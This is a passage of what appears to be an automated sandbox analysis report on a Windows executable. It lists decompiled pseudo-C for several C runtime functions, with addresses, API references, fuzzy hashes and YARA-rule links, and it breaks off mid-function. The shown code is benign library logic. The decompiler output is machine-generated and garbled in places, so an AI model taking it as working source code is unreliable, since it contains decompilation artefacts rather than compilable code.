                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                          • String ID: @.B
                                                                                                                                                                                          • API String ID: 3521780317-470711618
                                                                                                                                                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                          • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C73D, Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}













                                                                                                                                                                                          0x0040c73d
                                                                                                                                                                                          0x0040c690
                                                                                                                                                                                          0x0040c692
                                                                                                                                                                                          0x0040c697
                                                                                                                                                                                          0x0040c69e
                                                                                                                                                                                          0x0040c6a3
                                                                                                                                                                                          0x0040c6a8
                                                                                                                                                                                          0x0040c6aa
                                                                                                                                                                                          0x0040c6c8
                                                                                                                                                                                          0x0040c6ce
                                                                                                                                                                                          0x0040c6d1
                                                                                                                                                                                          0x0040c6d6
                                                                                                                                                                                          0x0040c6dc
                                                                                                                                                                                          0x0040c6df
                                                                                                                                                                                          0x0040c70f
                                                                                                                                                                                          0x0040c70f
                                                                                                                                                                                          0x0040c6e1
                                                                                                                                                                                          0x0040c6e2
                                                                                                                                                                                          0x0040c6e8
                                                                                                                                                                                          0x0040c6eb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c6ed
                                                                                                                                                                                          0x0040c6ee
                                                                                                                                                                                          0x0040c70b
                                                                                                                                                                                          0x0040c70b
                                                                                                                                                                                          0x0040c6eb
                                                                                                                                                                                          0x0040c714
                                                                                                                                                                                          0x0040c71b
                                                                                                                                                                                          0x0040c71e
                                                                                                                                                                                          0x0040c725
                                                                                                                                                                                          0x0040c72a
                                                                                                                                                                                          0x0040c72a
                                                                                                                                                                                          0x0040c6ac
                                                                                                                                                                                          0x0040c6ac
                                                                                                                                                                                          0x0040c6b3
                                                                                                                                                                                          0x0040c6b4
                                                                                                                                                                                          0x0040c6b6
                                                                                                                                                                                          0x0040c6b7
                                                                                                                                                                                          0x0040c6b8
                                                                                                                                                                                          0x0040c6b9
                                                                                                                                                                                          0x0040c6ba
                                                                                                                                                                                          0x0040c6bb
                                                                                                                                                                                          0x0040c6c3
                                                                                                                                                                                          0x0040c6c3
                                                                                                                                                                                          0x0040c731

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2805327698-0
                                                                                                                                                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                          • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413FCC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x3191620
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x3191620
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x3191620
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}










                                                                                                                                                                                          0x00413fcc
                                                                                                                                                                                          0x00413fcc
                                                                                                                                                                                          0x00413fcc
                                                                                                                                                                                          0x00413fcc
                                                                                                                                                                                          0x00413fce
                                                                                                                                                                                          0x00413fd3
                                                                                                                                                                                          0x00413fdd
                                                                                                                                                                                          0x00413fdf
                                                                                                                                                                                          0x00413fe7
                                                                                                                                                                                          0x00414008
                                                                                                                                                                                          0x0041400e
                                                                                                                                                                                          0x00414012
                                                                                                                                                                                          0x00414015
                                                                                                                                                                                          0x00414018
                                                                                                                                                                                          0x0041401e
                                                                                                                                                                                          0x00414020
                                                                                                                                                                                          0x00414022
                                                                                                                                                                                          0x00414025
                                                                                                                                                                                          0x0041402b
                                                                                                                                                                                          0x0041402d
                                                                                                                                                                                          0x0041402f
                                                                                                                                                                                          0x00414035
                                                                                                                                                                                          0x00414037
                                                                                                                                                                                          0x00414038
                                                                                                                                                                                          0x0041403d
                                                                                                                                                                                          0x00414035
                                                                                                                                                                                          0x0041402d
                                                                                                                                                                                          0x0041403e
                                                                                                                                                                                          0x00414043
                                                                                                                                                                                          0x00414046
                                                                                                                                                                                          0x0041404c
                                                                                                                                                                                          0x00414050
                                                                                                                                                                                          0x00414050
                                                                                                                                                                                          0x00414056
                                                                                                                                                                                          0x0041405d
                                                                                                                                                                                          0x00413fef
                                                                                                                                                                                          0x00413fef
                                                                                                                                                                                          0x00413fef
                                                                                                                                                                                          0x00413ff4
                                                                                                                                                                                          0x00413ff8
                                                                                                                                                                                          0x00413ffd
                                                                                                                                                                                          0x00414005

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                          • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(03191620), ref: 00414050
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                          • Opcode ID: aa7d619cf8389dd089defdc1841a73599edba9035eebd195b120bdc965c73694
                                                                                                                                                                                          • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa7d619cf8389dd089defdc1841a73599edba9035eebd195b120bdc965c73694
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413610, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                                                          0x00413615
                                                                                                                                                                                          0x0041361d
                                                                                                                                                                                          0x00413634
                                                                                                                                                                                          0x004135e0
                                                                                                                                                                                          0x004135e9
                                                                                                                                                                                          0x004135f5
                                                                                                                                                                                          0x004135f8
                                                                                                                                                                                          0x004135fb
                                                                                                                                                                                          0x004135fd
                                                                                                                                                                                          0x00413600
                                                                                                                                                                                          0x00413605
                                                                                                                                                                                          0x0041360f
                                                                                                                                                                                          0x00413607
                                                                                                                                                                                          0x0041360b
                                                                                                                                                                                          0x0041360b
                                                                                                                                                                                          0x0041361f
                                                                                                                                                                                          0x00413625
                                                                                                                                                                                          0x0041362d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041362f
                                                                                                                                                                                          0x0041362f
                                                                                                                                                                                          0x00413633
                                                                                                                                                                                          0x00413633
                                                                                                                                                                                          0x0041362d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                                                                                                          • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                          • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C748, Relevance: 6.1, APIs: 4, Instructions: 148COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}






























                                                                                                                                                                                          0x0040c748
                                                                                                                                                                                          0x0040c748
                                                                                                                                                                                          0x0040c752
                                                                                                                                                                                          0x0040c755
                                                                                                                                                                                          0x0040c757
                                                                                                                                                                                          0x0040c759
                                                                                                                                                                                          0x0040c77c
                                                                                                                                                                                          0x0040c781
                                                                                                                                                                                          0x0040c785
                                                                                                                                                                                          0x0040c788
                                                                                                                                                                                          0x0040c78a
                                                                                                                                                                                          0x0040c78a
                                                                                                                                                                                          0x0040c78d
                                                                                                                                                                                          0x0040c78f
                                                                                                                                                                                          0x0040c790
                                                                                                                                                                                          0x0040c791
                                                                                                                                                                                          0x0040c799
                                                                                                                                                                                          0x0040c79b
                                                                                                                                                                                          0x0040c79e
                                                                                                                                                                                          0x0040c773
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7a0
                                                                                                                                                                                          0x0040c7a0
                                                                                                                                                                                          0x0040c7a3
                                                                                                                                                                                          0x0040c7a9
                                                                                                                                                                                          0x0040c7b3
                                                                                                                                                                                          0x0040c7b5
                                                                                                                                                                                          0x0040c7b8
                                                                                                                                                                                          0x0040c7bd
                                                                                                                                                                                          0x0040c7c0
                                                                                                                                                                                          0x0040c7c3
                                                                                                                                                                                          0x0040c806
                                                                                                                                                                                          0x0040c808
                                                                                                                                                                                          0x0040c7f9
                                                                                                                                                                                          0x0040c7f9
                                                                                                                                                                                          0x0040c7fc
                                                                                                                                                                                          0x0040c81a
                                                                                                                                                                                          0x0040c81e
                                                                                                                                                                                          0x0040c8d8
                                                                                                                                                                                          0x0040c8de
                                                                                                                                                                                          0x0040c8de
                                                                                                                                                                                          0x0040c8e0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c8e0
                                                                                                                                                                                          0x0040c824
                                                                                                                                                                                          0x0040c827
                                                                                                                                                                                          0x0040c829
                                                                                                                                                                                          0x0040c843
                                                                                                                                                                                          0x0040c84a
                                                                                                                                                                                          0x0040c84f
                                                                                                                                                                                          0x0040c852
                                                                                                                                                                                          0x0040c857
                                                                                                                                                                                          0x0040c8d2
                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                          0x0040c859
                                                                                                                                                                                          0x0040c85b
                                                                                                                                                                                          0x0040c85d
                                                                                                                                                                                          0x0040c868
                                                                                                                                                                                          0x0040c86b
                                                                                                                                                                                          0x0040c88d
                                                                                                                                                                                          0x0040c88f
                                                                                                                                                                                          0x0040c892
                                                                                                                                                                                          0x0040c895
                                                                                                                                                                                          0x0040c89d
                                                                                                                                                                                          0x0040c89f
                                                                                                                                                                                          0x0040c8a6
                                                                                                                                                                                          0x0040c8ab
                                                                                                                                                                                          0x0040c8ae
                                                                                                                                                                                          0x0040c8c0
                                                                                                                                                                                          0x0040c8c0
                                                                                                                                                                                          0x0040c8c3
                                                                                                                                                                                          0x0040c8c3
                                                                                                                                                                                          0x0040c8c8
                                                                                                                                                                                          0x0040c8cd
                                                                                                                                                                                          0x0040c8cd
                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c8cd
                                                                                                                                                                                          0x0040c8b0
                                                                                                                                                                                          0x0040c8b3
                                                                                                                                                                                          0x0040c8b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c8b8
                                                                                                                                                                                          0x0040c8be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c8be
                                                                                                                                                                                          0x0040c8a1
                                                                                                                                                                                          0x0040c8a1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c8a1
                                                                                                                                                                                          0x0040c86d
                                                                                                                                                                                          0x0040c873
                                                                                                                                                                                          0x0040c880
                                                                                                                                                                                          0x0040c880
                                                                                                                                                                                          0x0040c882
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c877
                                                                                                                                                                                          0x0040c87a
                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                          0x0040c884
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c884
                                                                                                                                                                                          0x0040c82b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c82b
                                                                                                                                                                                          0x0040c7fe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7fe
                                                                                                                                                                                          0x0040c80a
                                                                                                                                                                                          0x0040c80f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c80f
                                                                                                                                                                                          0x0040c7ce
                                                                                                                                                                                          0x0040c7d8
                                                                                                                                                                                          0x0040c7db
                                                                                                                                                                                          0x0040c7e0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7e2
                                                                                                                                                                                          0x0040c7e4
                                                                                                                                                                                          0x0040c7e6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7e8
                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                          0x0040c7ed
                                                                                                                                                                                          0x0040c7ef
                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                          0x0040c7f4
                                                                                                                                                                                          0x0040c7f5
                                                                                                                                                                                          0x0040c7f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7ab
                                                                                                                                                                                          0x0040c79e
                                                                                                                                                                                          0x0040c75b
                                                                                                                                                                                          0x0040c760
                                                                                                                                                                                          0x0040c761
                                                                                                                                                                                          0x0040c762
                                                                                                                                                                                          0x0040c763
                                                                                                                                                                                          0x0040c764
                                                                                                                                                                                          0x0040c765
                                                                                                                                                                                          0x0040c76b
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                          • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2395185920-0
                                                                                                                                                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                          • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405D00, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                          			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
